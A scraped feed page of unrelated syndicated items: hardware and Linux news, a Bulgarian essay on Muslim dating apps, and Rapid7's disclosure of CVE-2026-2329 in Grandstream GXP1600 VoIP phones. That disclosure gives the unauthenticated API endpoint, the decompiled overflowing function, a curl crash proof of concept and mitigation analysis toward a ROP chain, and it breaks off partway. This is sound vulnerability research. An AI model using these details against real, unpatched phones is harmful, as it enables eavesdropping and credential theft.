Rick is an Enterprise Support Manager leading a team of Technical Account Managers (TAMs) dedicated to AWS independent software vendor (ISV) customer success. He partners with customers to help them use AWS services effectively while building innovative, cutting-edge solutions. With deep expertise in DevOps and systems engineering, Rick brings technical depth and strategic insight to help ISVs scale and optimize their AWS environments.

Arun Lakshmanan

Arun Lakshmanan

Arun is a Search Specialist with Amazon OpenSearch Service based out of Chicago, IL. He works closely with customers on their OpenSearch journey across various use cases, including vector search, observability, and security analytics.

MikroTik CRS418-8P-8G-2S+RM Review An All-in-One PoE Switch and Router

Post Syndicated from Patrick Kennedy original https://www.servethehome.com/mikrotik-crs418-8p-8g-2s-rm-review-an-all-in-one-poe-switch-router-marvell-qualcomm/

In our MikroTik CRS418-8P-8G-2S+RM review, we test a PoE+ switch doubling as an all-in-one, but we found something neat with its performance

The post MikroTik CRS418-8P-8G-2S+RM Review An All-in-One PoE Switch and Router appeared first on ServeTheHome.

[$] More accurate congestion notification for TCP

Post Syndicated from corbet original https://lwn.net/Articles/1058666/

The “More Accurate Explicit Congestion Notification” (AccECN) mechanism is
defined by this
RFC draft
. The Linux kernel has been gaining support for AccECN with
TCP over the last few releases; the 7.0 release will enable it by default
for general use. AccECN is a subtle change to how TCP works, but it has
the potential to improve how traffic flows over both public and private
networks.

Fedora now available in Syria

Post Syndicated from jzb original https://lwn.net/Articles/1059342/

Justin Wheeler writes, on Fedora
Magazine, that Fedora is now available in Syria once again:

Last week, the Fedora Infrastructure Team lifted
the IP range block
on IP addresses in Syria. This action restores
download access to Fedora Linux deliverables, such as ISOs. It also
restores access from Syria to Fedora Linux RPM repositories, the
Fedora Account System, and Fedora build systems. Users can now access
the various applications and services that make up the Fedora
Project. This change follows a recent update to the Fedora Export
Control Policy. Today, anyone connecting to the public Internet from
Syria should once again be able to access Fedora.

[…] Opening the firewall to Syria took seconds. However, months of
conversations and hidden work occurred behind the scenes to make this
happen.

An Asahi Linux progress report

Post Syndicated from corbet original https://lwn.net/Articles/1059339/

The Asahi Linux project, which is working to implement support for Linux on
Apple CPUs, has published a detailed 6.19
progress report
.

We’ve made incredible progress upstreaming patches over the past 12
months. Our patch set has shrunk from 1232 patches with 6.13.8, to
858 as of 6.18.8. Our total delta in terms of lines of code has
also shrunk, from 95,000 lines to 83,000 lines for the same kernel
versions. Hmm, a 15% reduction in lines of code for a 30% reduction
in patches seems a bit wrong…

Not all patches are created equal. Some of the upstreamed patches
have been small fixes, others have been thousands of lines. All of
them, however, pale in comparison to the GPU driver.

The GPU driver is 21,000 lines by itself, discounting the
downstream Rust abstractions we are still carrying. It is almost
double the size of the DCP driver and thrice the size of the
ISP/webcam driver, its two closest rivals. And upstreaming work has
now begun.

An update to the malicious crate notification policy (Rust Blog)

Post Syndicated from jzb original https://lwn.net/Articles/1059338/

Adam Harvey, on behalf of the crates.io
team
has published a blog
post
to inform users of a change in their practice of publishing
information about malicious Rust crates:

The crates.io team will no longer publish a blog post each time a
malicious crate is detected or reported. In the vast majority of cases
to date, these notifications have involved crates that have no
evidence of real world usage, and we feel that publishing these blog
posts is generating noise, rather than signal.

We will always publish a RustSec
advisory when a crate is removed for containing malware. You can
subscribe to the RustSec
advisory RSS feed
to receive updates.

Crates that contain malware and are seeing real usage or
exploitation will still get both a blog post and a RustSec
advisory. We may also notify via additional communication channels
(such as social media) if we feel it is warranted.

Тиндър/Миндър, халал, сайтове и приложения за запознанства

Post Syndicated from Атанас Шиников original https://www.toest.bg/tindur-mindur-halal-saytove-i-prilozhenia-za-zapoznanstva/

Тиндър/Миндър, халал, сайтове и приложения за запознанства

Ще започнем с по-скучната част, която често цитирам. Да разлистим въведението на ориенталиста Ноел Коулсън в мюсюлманското право – много полезен и информативен наръчник от 1964 г. Там той изброява няколко класически метафори за разнообразието и единството на мюсюлманския религиозен закон. Различни начини, по които традицията гледа на самата себе си. Дърво, чиито клони излизат от един ствол и корени. Море, което се образува от водите на различни реки. Различни дупки на една и съща риболовна мрежа. Все сравнения, които илюстрират принципа за различията или разнообразието (ихтилаф) в правото¹. От тях обаче любима ми е метафората за отделните нишки, които изтъкават една дреха. Защото тя обрисува не само пъстротата, но и взаимовръзката между идейните потоци в традицията, които покриват неподозирани тематични области. Ако трябва да надградим метафората,

религиозното право прилича и на килим. Като дръпнеш някоя нишка, не знаеш точно коя част от изображението може да се разплете.

Също като метафората с пеперудата. Размахал Аллах крилата на регулаторната пеперуда в Корана през VII век – и ето, в днешен Иран налагат смъртно наказание за богохулство, изнасилване, прелюбодеяние, хомосексуализъм, убийство, притежание и трафик на наркотици, „развала по земята“, метеж и прочее в заетата от шариата рамка за наказания за углавни престъпления (худуд).

Така е, шариатският килим съдържа всякакви сюжети. Не само романтични и декоративни. И не прилича на персийски килим с растителни орнаменти и цветчета като тези от колекцията на „Метрополитън“. По-скоро наподобява (да насилим още повече текстилната метафора) гоблена от Байо. Пак е средновековен артефакт (от ХI столетие след Христа), само че от Западна Европа. На него хората правят всякакви неща. Садят, орат, ловуват, гребат, строят. Понякога се колят, тъй като основният сюжет на гоблена е норманското нашествие в Англия.

Такива са и нишките в шариатския вътък. Четеш хадиси за края на света от IX век и се приземяваш в Рака, Сирия, при Абу Бакр ал-Багдади от ИДИЛ през XXI век. Подхващаш истории за живота на Пророка и неговия отказ да отслужи молитва за починал съратник – натъкваш се на основанията за популярен днес метод за трансфер (хауала) на пари в исляма. Подръпваш косъм от брадата на Пророка и стигаш до средновековното схващане за „инстинкта“ и „ума“ при Ибн ал-Джаузи от XII столетие. Попадаш на сънищата в дневника на Бен Ладен и научаваш за съновника на Ибн Сирин от VIII век. Четеш стари трактати за образованието, където учениците биват дисциплинирани чрез чепик, и се завихряш в истории за налъма на самия Пратеник на Аллах. Търсиш стари съчинения по арабска калиграфия и научаваш, че Аллах дава персийския шрифт на неговия създател Мир Али ат-Табризи чрез движенията на патицата. Интересуваш се защо прасето е възбранено в Корана и Сунната, и откриваш апокрифната история за появата на зурлестото по време на потопа и Нух/Ной от Библията. Проследяването на тези пътечки може да отдадете на невъздържано въображение и липса на асоциативна дисциплина. А пък аз ще ви отвърна с клиширания отговор на инфлуенсър и корпоративен коуч, че „трябва да умеем да свързваме точките“.

И сега е същото. Чета за онлайн общности и джихад в „Хаштаг ислям“ на моя познат Гари Бунт. Нали обаче не си мислите, че мюсюлманските виртуални общности се занимават само с киберджихад в конфликтни зони. Има всякакви виртуални общности, съставящи онова, което Гари нарича „киберислямски среди“ (Cyber-Islamic Environments, CIE). Ето, преди около двайсет години, далеч преди социалните мрежи да станат популярни, в епохата на ретро онлайн форумите, авторът на този текст участваше в дигитална общност на арабски калиграфи от Саудитска Арабия. Бяха много уважителни въпреки потребителското ми име Ад-Дахил (Натрапника). „Нищо че си християнин, и ти може да се занимаваш с калиграфия, нали сте от Хората на Писанието.“ Този опит за приобщаване, разбира се, минаваше през избирателно позоваване на Корана и на пасажите, в които се говори положително за юдеите и християните като притежатели на китаб, Писание (например 3:113 или 3:199) – да не си мислите, че е признак на някакъв секуларен либерализъм и толерантност по смисъла на „Писмо за толерантността“ на Джон Лок от XVII век.

А тук, в книгата на Гари, се натъквам на кратък откъс за уебсайтовете и приложенията за запознанства за мюсюлмани. Връзките между исляма, въпросите за пола и сексуалността са основна част от дискусиите относно религиозния авторитет онлайн. Онлайн се конструират различни типове взаимоотношения, но също могат и да бъдат разрушени. Браковете и връзките, изградени чрез онлайн инструменти, са важен компонент от живота на общностите и като такъв могат да представляват комерсиален интерес.

Още през 2014 г. сайтът SingleMuslim твърди, че има над един милион потребители и способства за четири брака на ден².

Този тип виртуални общности и инструменти имат далеч по-проблематичен потенциал от похвалната в мюсюлманската традиция арабска калиграфия, от кулинарните групи, обществата за изучаване на хадиси или за споделяне на снимки от поклонението (хадж) в Мека и Медина. Защото отношенията между половете преди и след брака сред мюсюлманите са тема твърде чувствителна, която подлежи на обширна регулация в свещения закон. Има много червени линии. Пресичането им може да ти навлече беля, включително и телесен зулум, като пребиване с камъни в страни, където законодателството е основано на шариата или социалната практика е структурирана по традиционен начин.

Но каква ли би била повелята на Аллах, „Вечноживия, Неизменния“, Когото „не Го обзема нито дрямка, нито сън“ (Коран 2:255)? Защото, да не се лъжем, целта на свещения закон е да приведе практиката на мюсюлманската общност (умма) в съответствие с божествената воля, изразена в Корана и Сунната. А и според известното предание от Пророка „религиозните учени (улама) са наследниците на пророците“. Тоест волята на Всевишния се изявява през устата на шейховете.

Бързо прекосяване на дигиталната агора разкрива любопитни детайли. Изграденото по модела на Tinder приложение отпреди години се казваше Minder. Не, това не е по аналогия на българското разговорно „телевизор-мелевизор“, „диван-миван“, а просто Tinder за мюсюлмани. Сега обаче се е преименувало на Salams, тоест „поздрави“. Впрочем от 2023 г. приложението се притежава от същата компания, която прави и Tinder – Match Group. Това пък предизвиква критики сред някои мюсюлмански общности с обвинения, че компанията е произраелска и „ционистите са превзели приложението Salams.

Salams се рекламира като приложение за мюсюлмански запознанства, приятели и общуване с около 4 млн. потребители мюсюлмани по света, „помогнало на над 460 000 мюсюлмански двойки и приятели, слава на Аллах!“. Интерфейсът е изграден на принципа на Tinder и цели да те „мачне“, тоест да ти намери съответстващи на твоя профил и интереси потребители.

Хасан, 34 годишен, се намира в Лондон, идва от Пакистан и е лекар. Търси женски профили, подобни на неговия. Приложението поддържа чат, аудио- и видеоразговори. Насърчават се реални снимки, а платформата ти предлага и аналитична информация: профилът ти е най-популярен в Лондон например; 51 човека са плъзнали надясно, тоест сметнали са те за подходящ; средната възраст на тези, които са те харесали, е 31 години, а качествата им са „амбициозен“, „кафеен сноб“, „обича природата“, „нощна птица“. Налице са и различни абонаментни планове. 

Muzz е друго подобно приложение, преди известно като Muzzmatch. Разработено е от бивш служител на Morgan Stanley, който се самообучава да програмира. Отново заглавието е ясно – помагаме на мюсюлманите да си намерят половинката. Вече от доста време е на пазара (от 2015 г.), има над 16 млн. потребители, а броят на браковете, които компанията твърди, че са се осъществили чрез него, е дори по-висок, отколкото на Salams – около 600 000 към момента на писането на този текст. Това го прави най-популярното приложение за тази цел – не само във Великобритания, но и в глобален план. Откровено се рекламира като „Там, където мюсюлманите се женят“.

Платформата предлага допълнителна сигурност, като първоначално замъглява снимките и изисква верификация чрез документ за самоличност. Интересно е, че има възможност да покажете колко са сериозни брачните ви намерения: например от момента на намиране на подходящ партньор колко време минава в чат, запознаване със семейството и накрая – сключване на самия брак. Предвидена е и функция, при която се самооценявате колко сте религиозен, колко често се молите, носите ли хиджаб, пушите ли, пиете ли. И още нещо – имате възможност да добавите „настойник“ (уали) като трето лице към комуникацията с партньора.

За Muslima, друго приложение с доста ясно заглавие („мюсюлманка“), се твърди, че има 7,5 млн. потребители от САЩ, Европа, Азия, Близкия изток и „много други страни“. „Срещнете се с необвързани мюсюлмани, готови за никах (брак)!“, стои като техен лозунг. И тук имаме сортиране по профили – пол, възраст, местоположение, външен вид, начин на живот (каквото и да значи това), „културни ценности“. И накрая, за любителите на ориенталски сладкиши като мен – за жалост, няма приложение за запознанства с името кюнефе, към което съм пристрастен, но пък има Baklava. „Първото и единствено приложение за арабски връзки“ е създадено от Лейла Мухайзен, отраснала в Ливан, но живееща в Лос Анджелис. През 2020 г. тя стартира този донякъде захаросан проект, който предлага одобрени от родителите партньори, както и възможността да те свържат с хора от твой тип, „такива, които те разбират и ти поръчват допълнителен чеснов сос към шауармата (дюнера, по нашенски) още преди да си го поискал“.

Тиндър/Миндър, халал, сайтове и приложения за запознанства
Двойка в Рабат © Атанас Шиников

Дотук изредих големите играчи, както и един, към чието име имам пристрастие.

Но да не си мислите, че пазарът е толкова свит и монополизиран? Изборът е богат. Ето го например AlKhattaba – името му идва от стария обичай на сватовничеството и традиционната институция на сватовницата (хатиба), която явно иска да замести. Или пък SingleMuslim, ArabLounge, Pure Matrimony, че и Nikah.com. Да не забравяме, че и общите платформи за запознанства и общуване като вече споменатия Tinder, но и групи в други популярни социални мрежи могат да бъдат използвани за целта. Тази част от виртуалното пространство обаче е откровено нерегулирана и там, както казват средновековните западни картографи, когато очертават границите на познатия свят, „има [нехалални] дракони“ (hic sunt dracones), тоест човек много лесно може да стъпи накриво.

Стои обаче отворен въпросът за религиозния авторитет и изискванията.

Като част от стандартните модели на разпространение на приложения за съответните платформи (например Google Play Store за Android), добрите практики на ИТ индустрията и регулаторната рамка, откъм техническа гледна точка такива приложения трябва да отговарят например на стандарти за информационната сигурност и обслужване. Криптиране на комуникацията, начини на автентификация на потребителите, достъп до съдържание на локалното устройство, съхраняване, обработване и опазване на личните данни, сигурност на плащанията при закупуване на различни нива на абонамент, техническа поддръжка и пр. Цялата техническа досада, отнасяща се за всички съвременни платформи, с които сте свикнали в ежедневието си, е валидна и тук.

Този елемент не е толкова интересен, колкото другият –

как се гарантира, че приложенията и съответно услугата, която предлагат, са халал?

С други думи, кой оценява и легитимира тази ИТ услуга със съответните ѝ компоненти и изисквания и как се подсигурява, че в нейния дизайн са вградени изискванията на шариата? Тук случаят е много различен от сертифицирането на храни като халал, тоест позволени по шариата, където има централни агенции и организации. Това не е месарница или хранителен магазин на Женския пазар в София; хранителен продукт за износ към арабския свят; шоколад, на който пише на арабски например „не съдържа свински продукти“; или цяло охладено пиле с етикет „халал“.

Не съществува практиката независим авторитет да консултира, инспектира и в крайна сметка да удостоверява съответствие с религиозната норма в този тип решения. Има такива услуги, но те покриват предимно ИТ продукти за финансови технологии, доколкото шариатът има строги регулации и към това. Например изисквания за дигитални решения, които извършват транзакции по системата SWIFT и са изрядни от гледна точка на ислямските регулации (SWIFT Certified Application – Islamic Finance Criteria). Начинът, по който изискванията на свещения закон са интерпретирани и вградени във функционалността на приложението за запознанства, зависи от преценката на екипите по бизнес и техническа развойна дейност и остава скрит за нас.

Естествено, съответствена на шариата е заявената цел, която обуславя и отделни функционалности. Приложенията са ясно определени като платформи за приятелство с цел брак в спазване на религиозните принципи. Оттук и елементи като възможностите за замъгляване на снимките в началото и тяхното откриване само при наличие на сериозен интерес. Или посочване на времевата рамка на едни отношения в приложението, която се увенчава със сключване на брак по шариата. Филтрирането по религиозни интереси и степен на отдаденост на религията. Или нещо друго типично за мюсюлманския аналогов „мачмейкинг“ от времето преди дигиталните платформи – възможност за получаване на одобрението на родителите или надзора на трето лице по време на целия комуникационен процес.

Разчита се и на консенсуса на потребителите, които да припознаят в електронните платформи изпълнение на определена тяхна нужда в съответствие с шариата. Което впрочем е вековен механизъм при изграждането на религиозния авторитет сред мюсюлманите. Това се вижда например при издаването на решения на определени религиозни въпроси (фатауа, фетви). При тях също мюсюлманите са свободни да отидат при когото припознават като авторитет, тоест най-добре отговарящ на техните нужди.

Метафората за религиозния пазар е валидна и при използваните приложения за запознанства. Придържането към шариата е ангажимент на самия потребител, само частично способстван от съобразени с повелята на Аллах технически функционалности, ако въобще такива съществуват в използваната платформа (защото може да е отворена за всички социална мрежа например). Халалността е в окото на халалстващия. Но е и отговорност на всеки, ако трябва да перифразирам корпоративния лозунг относно информационната сигурност или качеството.

Всички тези приложения, разбира се, са златна мина за събиране на данни и анализ на потребителската популация.

Muzz периодично публикува свой собствен доклад относно тенденциите при мюсюлманските запознанства и бракове. В този от 2023 г. откриваме най-халалните държави по класификацията на самото приложение – колко често мюсюлманите се молят, ядат или пият халални продукти или пушат. Така Кения заема първо място с 98% потребители с халално поведение, следвана от Индонезия (96,7%), Нигерия (96,4%), Малайзия (96,2%) и Великобритания (95,8%). На дъното на най-нехалалните страни са Тунис (с 80,3% халални потребители), следвани надолу от Ирак, Йордания, Австрия и Бахрейн. „Изненадващо е – заключават авторите на доклада, – че четирите от петте най-нехалални държави са такива с мюсюлманско мнозинство.“ Разсъжденията относно причините за това оставям на вас.

Около 57 на сто от жените, потребителки на Muzz в глобален план, носят хиджаб, абая или никаб – варианти на покривало за главата. Също в глобален план тенденцията на сключване на бракове със съдействието на платформата върви стръмно нагоре – всеки ден се отчитат средно 380 брака, като челното място се заема от френски мюсюлмани. Средно на мъжете отнема 4,9 месеца да открият съпруга, докато при жените периодът е малко по-дълъг – 5,4 месеца. А най-бързо сключеният брак след „мачване“ е три часа! 22 процента от потребителите в момента на присъединяване към Muzz са имали предишен брак – разведени, разделени, бракът е анулиран или са овдовели. Годината е обявена за „Година на ниския мюсюлмански цар“, защото мъже, по-ниски от 183 см, не получавали твърде много шансове в други приложения. Дали това е така с мюсюлманските мъже? Явно не.

88% процента от жените в това приложение твърдят, че биха сключили брак с мъже, по-ниски от 183 см. Най-ниската медиана откъм очаквана височина е определена от пакистанските жени – 175 см. А най-високи – в буквалния смисъл! – са очакванията на саудитките. Цели 180 см. (Не ми се мисли какви други мерки биха могли да се събират от този тип софтуер!)

Етническата картина на така изградените връзки също е любопитна. Половината от тях са между различни етноси. „Събираме уммата в едно!“, гласи лозунгът. В Австралия и ОАЕ три от четири връзки са междуетнически. Най-нисък е процентът в Саудитска Арабия, Египет, Нигерия и Сингапур (много под 1%). За жалост, не откривам доклад за 2024 г. (така или иначе, за този от 2025 г. изглежда твърде рано), а би било любопитно дали е настъпила драстична промяна.

(Следва продължение.)

1 Coulson, N. J. A History of Islamic Law. Edinburgh: Edinburgh University Press, 1964, p. 86.

2 Bunt, G. R. Hashtag Islam. Chapel Hill: University of North Carolina Press, 2018, p. 49.

В рубриката „Ориент кафе“ Атанас Шиников поднася любопитни теми, свързани не толкова с горещата политика, колкото с историята и културата на Близкия изток. А той, древен и днешен, е по-близко до нас и съвремието ни, отколкото си представяме.

The Phone is Listening: A Cold War–Style Vulnerability in Modern VoIP

Post Syndicated from Douglas McKee original https://www.rapid7.com/blog/post/ve-phone-listening-cold-war-vulnerability-modern-voip

I don’t know about you, but when I think about “critical vulnerabilities,” I usually picture ransomware, data theft, or maybe a server falling over at 2 a.m. while someone frantically searches Slack for the last good backup.

What I don’t picture is a scene straight out of a Cold War spy film.

CVE-2026-2329: Setting the scene

Dimly lit office. After hours. The city skyline glowing through the glass. Two executives leaning over a polished conference table, whispering about an acquisition. A red light blinking softly on the desk phone. Everything feels normal… Except it isn’t. Researchers at Rapid7 have disclosed CVE-2026-2329, a critical unauthenticated stack-based buffer overflow in the Grandstream GXP1600 series of VoIP phones. Let me take a moment to explain why that sentence, while technical and slightly dry on the surface, should make you sit up a little straighter.

At its core, this is a classic memory corruption issue. The kind many of us learned from in our early exploitation days. And if you’ve spent time in cybersecurity long enough, you’ve seen this movie before. But here’s where it gets interesting: an attacker finds an exposed VoIP phone – maybe it’s directly reachable, or maybe it’s pivoted to from somewhere else inside the network. They trigger the overflow, gain root, and at this point, nothing explodes. No alarms go off, and the phone doesn’t brick itself in protest. It just quietly accepts new instructions.

With root access, the attacker can reconfigure the device’s SIP settings to point to infrastructure they control. A malicious SIP proxy. Calls still dial. The display still lights up. The user still hears a dial tone. But now, every call flows through someone else’s hands first. There’s no dramatic “wiretap installed” moment. No van parked outside with antennas on the roof. Just silent, transparent interception. Conversations about contracts, negotiations, legal strategy, maybe even sensitive personal matters — all are relayed in real time.

This isn’t about crashing a device for fun, it’s about persistence and invisibility. VoIP phones are trusted implicitly. They sit on desks for years, deployed once and forgotten thereafter. Rarely monitored like servers or endpoints, and almost never treated as high-value assets. But voice carries nuance. Tone, intent, and strategy. Things you don’t always see in email or chat logs. The reality of it is that once you move from “denial of service” to “silent interception,” the impact shifts dramatically. This stops being a theoretical CVE in a spreadsheet and starts becoming a confidentiality issue at the human level.

Now, to be fair, exploitation requires knowledge and skill. This isn’t a one-click exploit with fireworks and a victory banner. But the underlying vulnerability lowers the barrier in a way that should concern anyone operating these devices in exposed or lightly-segmented environments. And that’s why this one caught my attention. Not because it’s the first buffer overflow we’ve ever seen, and not because it’s technically flashy, but because it works quietly. Perfectly.

Like a phone that never misses a call, but while someone else is listening.

The technical details on CVE-2026-2329

If you’re a researcher, engineer, or just someone who enjoys digging into stack layouts and exploit chains, we’ve put together a full technical deep dive on the Rapid7 blog. That includes:

  • Root cause analysis
  • Stack memory breakdown
  • Exploit development methodology
  • Post-exploitation impact
  • Metasploit module details

You can read the full technical analysis here.

Security updates for Wednesday

Post Syndicated from jzb original https://lwn.net/Articles/1059333/

Security updates have been issued by Debian (ceph, gimp, gnutls28, and libpng1.6), Fedora (freerdp, libpng, libssh, mingw-libpng, mingw-libsoup, mingw-python3, pgadmin4, python-pillow, thunderbird, and vim), Mageia (postgresql15), Red Hat (python-urllib3), SUSE (cdi-apiserver-container, cdi-cloner-container, cdi- controller-container, cdi-importer-container, cdi-operator-container, cdi- uploadproxy-container, cdi-uploadserver-container, cont, frr, gpg2, kubernetes, kubernetes-old, libsodium, libsoup-2_4-1, libssh, libtasn1, libxml2, nodejs22, openCryptoki, openssl-3, and python311-pip), and Ubuntu (frr, linux-aws, linux-aws-6.8, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-oracle, linux-oracle-6.8, linux-aws-fips, linux-fips, linux-gcp-5.15, linux-kvm, linux-oracle, linux-oracle-5.15, linux-gcp-fips, linux-nvidia, linux-nvidia-tegra-igx, linux-oem-6.17, linux-realtime, linux-raspi-realtime, nova, and pillow).

CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)

Post Syndicated from Stephen Fewer original https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed

Overview

Rapid7 Labs conducted a zero-day research project against the Grandstream GXP1600 series of Voice over Internet Protocol (VoIP) phones. This research resulted in the discovery of a critical unauthenticated stack-based buffer overflow vulnerability, CVE-2026-2329. A remote attacker can leverage CVE-2026-2329 to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. A vendor supplied firmware update, version 1.0.7.81, is available to fully remediate CVE-2026-2329.

The vulnerability is present in the device’s web-based API service, and is accessible in a default configuration. As all models in the GXP1600 series share a common firmware image, the vulnerability affects all six models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.

CVE-2026-2329 has a CVSSv4 score of 9.3 (Critical), and a Common Weakness Enumeration (CWE) of CWE-121: Stack-based Buffer Overflow.

Impact

To demonstrate the impact of this vulnerability, a Metasploit exploit module has been developed. This demonstrates how an unauthenticated attacker could leverage this vulnerability to gain root privileges on a vulnerable device. A complimentary post-exploitation module has also been developed. This allows an attacker to gather credentials, such as local user and SIP accounts, stored on a compromised GXP1600 device. Both Metasploit modules are available here.

Shown below is the exploit module being run against a target Grandstream GXP1630 device running a vulnerable firmware version 1.0.7.79.

⠀

figure1_grandstream_gxp1600_rce1.png
Figure 1: Metasploit exploit module targeting a GXP1630 device.

⠀

As we can see above, the attacker achieves unauthenticated RCE with root privileges on the device. This is demonstrated by executing a Meterpreter payload and running several arbitrary OS shell commands.

In addition to achieving RCE with root privileges, we can also demonstrate using this capability to extract secrets from the target device, such as local and SIP account credentials. Shown below is a Metasploit post-exploitation module that leverages an existing session on the target (established via the exploit module) to extract secrets from the device.

⠀

figure2_grandstream_gxp1600_rce2.png
Figure 2: Metasploit post module gathering credentials from a GXP1630 device.

⠀

Finally, we can leverage our RCE capabilities to reconfigure the target device to use a malicious SIP proxy, allowing an attacker to transparently intercept phone calls to and from the device, and eavesdrop on the audio. While the ability to leverage a malicious SIP proxy to intercept phone calls is not specific to these Grandstream devices, and is dependent on the SIP infrastructures configuration, it highlights the serious impact an unauthenticated RCE vulnerability has against VoIP phones. Rapid7 Labs has developed a SIP proxy for testing and auditing SIP infrastructure, which is available here.

Credit

This vulnerability was discovered by Stephen Fewer, Senior Principal Security Researcher at Rapid7 and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Technical analysis

Our analysis is based upon a GXP1630 device running firmware version 1.0.7.79. During testing, the test device had an IPv4 address of 192.168.86.77.

A HTTP service is listening by default on TCP port 80. This service provides both a web administration interface and an API. The API endpoint /cgi-bin/api.values.get is accessible to a remote attacker with no authentication. This endpoint is designed to request one or more configuration values from the phone. For example, you can request the phone’s firmware version and model number via the following HTTP POST request using curl.

⠀

C:\>curl -ik http://192.168.86.77/cgi-bin/api.values.get --data "request=68:phone_model"
HTTP/1.0 200 OK
Content-Type: application/json;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Status: 200 OK
Set-Cookie: HttpOnly

{ "response": "success", "body": { "68": "1.0.7.79", "phone_model": "GXP1630" } }

⠀

The api.values.get API accepts an HTTP parameter named request. This parameter contains a colon-delimited list of identifiers to retrieve a corresponding value for (highlighted in yellow above). In the example above, identifier 68 corresponds to the phone’s firmware version number, and identifier phone_model corresponds to the phone’s model. We can see in the response, these values are returned.

Both the HTTP service and the API are implemented in the native code binary /app/bin/gs_web (32-bit ARM, Little Endian). Decompiling the function that handles a request to the api.values.get endpoint, we can see how the request parameter is split into colon-delimited parts for processing.

⠀

void __fastcall sub_144B4(int a1, char *a2, int a3)
{
	int v5; // r6
	const char *v6; // r5
	int v7; // r3
	int v8; // r6
	char *cookie; // r7
	char *remote_addr; // r0
	int v11; // r10
	char *request_buffer; // r11
	int request_length; // r9
	int request_offset; // r4
	int part_length; // r3
	int next_char; // r1
	char *v17; // r2
	char small_buffer[64]; // [sp+0h] [bp-68h] BYREF
	char v19[40]; // [sp+40h] [bp-28h] BYREF

	v5 = (*(int (__fastcall **)(int))(*(_DWORD *)a3 + 16))(a3);
	v6 = (const char *)json_object_new_object();
	sub_CC60(v5, (int)"response", (int)"success", v7);
	sub_CAA4(v5, "body", v6);
	v8 = sub_DE50();
	cookie = get_cookie(a2, (Grandstream::CommonUtils *)"session-identity");
	remote_addr = get_remote_addr();
	v11 = sub_DEC4(v8, (Grandstream::CommonUtils *)cookie, (Grandstream::CommonUtils *)remote_addr);
	request_buffer = sub_C19C(a2, (Grandstream::CommonUtils *)"request");
	request_length = Grandstream::CommonUtils::strlen(request_buffer);
	if ( request_length > 0 )
	{
		request_offset = 0;
		part_length = 0;
		small_buffer[0] = 0;
		do
		{
			next_char = (unsigned __int8)request_buffer[request_offset];
			v17 = &v19[part_length];
			if ( next_char == ':' )
			{
				*(v17 - 64) = 0;
				sub_14354(a1, v6, small_buffer, v11);
				part_length = 0;
				small_buffer[0] = 0;
			}
			else
			{
				*(v17 - 64) = next_char;
				++part_length;
			}
			++request_offset;
		}
		while ( request_offset != request_length );
		if ( part_length )
		{
			small_buffer[part_length] = 0;
			sub_14354(a1, v6, small_buffer, v11);
		}
	}
}

⠀

The request parameter (referenced via the variable request_buffer above) is iterated over character by character. If the next character is not a colon character, this next character is appended to a small 64 byte buffer on the stack (the variable small_buffer above). If the next character is a colon, or the end of the request parameter is reached, the current identifier held in the small buffer is null terminated and then processed to retrieve that identifier’s value.

When appending another character to the small 64 byte buffer, no length check is performed to ensure that no more than 63 characters (plus the appended null terminator) are ever written to this buffer.

Therefore, an attacker-controlled request parameter can write past the bounds of the small 64 byte buffer on the stack, overflowing into adjacent stack memory. This can be demonstrated with the following curl command, which supplies a 256 byte request parameter:

⠀

curl -ik http://192.168.86.77/cgi-bin/api.values.get --data 
"request=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

⠀

By either attaching a debugger to the gs_web process or inspecting a core dump, we can observe the overflow and how the attacker-controlled data corrupts the stack contents to give the attacker control over multiple CPU registers, including the Program Counter (PC), as shown below.

⠀

figure3_gdb_crash1.png
Figure 3: GDB session showing the process registers after the stack-based overflow.

Exploitation

To leverage this stack-based buffer overflow for remote code execution, we examine the gs_web binary using the checksec tool, to see what mitigations are present. 

⠀

$ /usr/bin/checksec --file=./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web --format=json | jq
{
  "./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web": {
    "relro": "no",
	"canary": "no",
	"nx": "yes",
	"pie": "no",
    "rpath": "no",
    "runpath": "no",
    "symbols": "no",
    "fortify_source": "no",
    "fortified": "0",
    "fortify-able": "5"
  }
}

⠀

We can see that No Execute (NX) is enabled. This means the stack segment will not be executable. Therefore, to execute arbitrary code we will need to leverage a Return Oriented Programming (ROP) chain.

We can see via checksec that stack canaries are not present (we also knew this from the above core dump, showing PC control after the vulnerable function returns). This means the stack-based buffer overflow will not be detected at run time, and a corrupted return address stored on the stack can be used to control the Program Counter (PC) register, when the vulnerable function returns from the corrupted stack frame.

We can also see that the binary has not been linked as a Position Independent Executable (PIE). This prevents Address Space Layout Randomization (ASLR) from randomizing the main binaries code segment. We can therefore know in advance virtual addresses (VA) within the code segment for use during construction of a ROP chain.

We are left with a problem that the non-PIE binary gs_web has its code segment loaded at a VA of 0x00008000, as shown below via the readelf tool.

⠀

$ readelf -l ./Release_GXP16xx_1.0.7.79/squashfs-root/app/bin/gs_web

Elf file type is EXEC (Executable file)
Entry point 0xbffc

There are 7 program headers, starting at offset 52

Program Headers:
	Type	Offset		VirtAddr	PhysAddr	FileSiz		MemSiz		Flg		Align
	EXIDX	0x0115d8	0x000195d8 	0x000195d8 	0x00810 	0x00810 	R		0x4
	PHDR	0x000034 	0x00008034 	0x00008034 	0x000e0 	0x000e0 	R E 	0x4
	INTERP	0x000114 	0x00008114 	0x00008114 	0x00014 	0x00014 	R		0x1
		[Requesting program interpreter: /lib/ld-uClibc.so.0]
	LOAD	0x000000 	0x00008000 	0x00008000 0x11dec 		0x11dec 	R E 	0x8000
